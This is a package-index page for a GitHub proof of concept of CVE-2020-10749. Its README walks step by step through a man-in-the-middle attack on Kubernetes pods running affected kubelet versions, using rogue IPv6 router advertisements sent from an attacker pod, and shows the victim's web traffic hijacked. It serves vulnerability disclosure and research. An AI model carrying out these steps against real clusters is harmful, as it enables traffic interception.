Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/knqyf263/CVE-2020-10749
CVE-2020-10749 PoC (Kubernetes MitM attacks via IPv6 rogue router advertisements)
https://github.com/knqyf263/CVE-2020-10749
exploit ipv6 kubernetes vulnerability
Last synced: 25 days ago
JSON representation
CVE-2020-10749 PoC (Kubernetes MitM attacks via IPv6 rogue router advertisements)
- Host: GitHub
- URL: https://github.com/knqyf263/CVE-2020-10749
- Owner: knqyf263
- License: apache-2.0
- Created: 2020-06-11T15:42:18.000Z (over 4 years ago)
- Default Branch: master
- Last Pushed: 2020-06-11T16:21:01.000Z (over 4 years ago)
- Last Synced: 2024-02-15T10:36:49.548Z (10 months ago)
- Topics: exploit, ipv6, kubernetes, vulnerability
- Language: Python
- Size: 33.4 MB
- Stars: 27
- Watchers: 4
- Forks: 14
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- awesome-k8s-security - CVE-2020-10749 PoC - malicious containers in Kubernetes clusters to perform man-in-the-middle (MitM) attacks (CVEs)
README
# CVE-2020-10749
CVE-2020-10749 PoC (Kubernetes MitM attacks via IPv6 rogue router advertisements)For educational purposes only
![demo](imgs/CVE-2020-10749.gif)
## Requirements
- Kubernetes cluster with the following kubelet version
- kubelet v1.18.0-v1.18.3
- kubelet v1.17.0-v1.17.6
- kubelet < v1.16.11## Exploit
### Deploy a victim Pod
```
$ kubectl apply -f victim/victim.yml
$ kubectl ge pods
NAME READY STATUS RESTARTS AGE
victim-5484d9f977-pgtnh 1/1 Running 0 10s
$ kubectl exec -it victim-5484d9f977-pgtnh -- sh
/ # apk add curl
/ # ip -6 a show eth0
3: eth0@if25: mtu 1450 state UP
inet6 fe80::3c07:afff:feb5:7219/64 scope link
valid_lft forever preferred_lft forever
/ # ip -6 route
fe80::/64 dev eth0 metric 256
ff00::/8 dev eth0 metric 256
$ curl http://example.com
```### Deploy an attacker Pod
```
$ kubectl apply -f attacker/attacker.yml
$ kubectl get pods
NAME READY STATUS RESTARTS AGE
attacker-8857dd5c9-pnzjw 1/1 Running 0 50s
victim-5484d9f977-pgtnh 1/1 Running 0 10s
```### Send a rogue router advertisement message
```
$ kubectl exec -it attacker-8857dd5c9-pnzjw -- sh
/ # ip a show eth0 | grep "link/ether" | awk '{print $2}'
aa:ca:d1:91:8f:23
/ # sed -i 's/\[YOUR_MAC_ADDR\]/aa:ca:d1:91:8f:23/g' fake_ra.py
/ # python fake_ra.py
Sending a fake router advertisement message...
.
Sent 1 packets.
```### Launch a rogue server
```
$ kubectl exec -it attacker-8857dd5c9-pnzjw -- sh
/ # python server.py
Listening...
```### Acccess to a legitimate web site
Make sure that a new IPv6 address and the default gateway are added.```
$ kubectl exec -it victim-5484d9f977-pgtnh -- sh
/ # ip -6 a show eth0
3: eth0@if27: mtu 1450 state UP
inet6 2001:db8:1:0:1854:9aff:fe75:2368/64 scope global dynamic
valid_lft forever preferred_lft forever
inet6 fe80::1854:9aff:fe75:2368/64 scope link
valid_lft forever preferred_lft forever
/ # ip -6 route
2001:db8:1::/64 dev eth0 metric 256
fe80::/64 dev eth0 metric 256
default via fe80::42:fcff:dead:beef dev eth0 metric 1024 expires 0sec
ff00::/8 dev eth0 metric 256
/ # curl http://example.com
malicious!!!!!!!
```## Reference
- https://github.com/kubernetes/kubernetes/issues/91507## Author
Teppei Fukuda